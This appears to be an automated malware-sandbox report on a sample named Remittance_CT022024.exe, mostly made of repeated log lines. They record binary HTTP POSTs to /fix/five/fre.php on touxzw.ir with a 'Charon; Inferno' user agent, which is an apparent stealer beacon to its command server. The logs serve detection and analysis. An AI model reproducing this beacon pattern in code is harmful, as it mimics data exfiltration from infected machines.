            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007A22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007A22EE
            Source: global trafficDNS traffic detected: DNS query: touxzw.ir
            Source: unknownHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 180Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nPJS50QNWW259uVBVU72LFoeqEHQtR42x67Z%2Bzudj9osIxFZrkh7SS%2BRWCx9O0PpzKBmkxoSpkFIKX%2FpYlz9wnK9E2NbPJ%2FTmaPe%2FS7buOaPh%2Fpk4fn6AUixQ1s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f74f4991d5e79-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2701&min_rtt=2701&rtt_var=1350&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=418&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
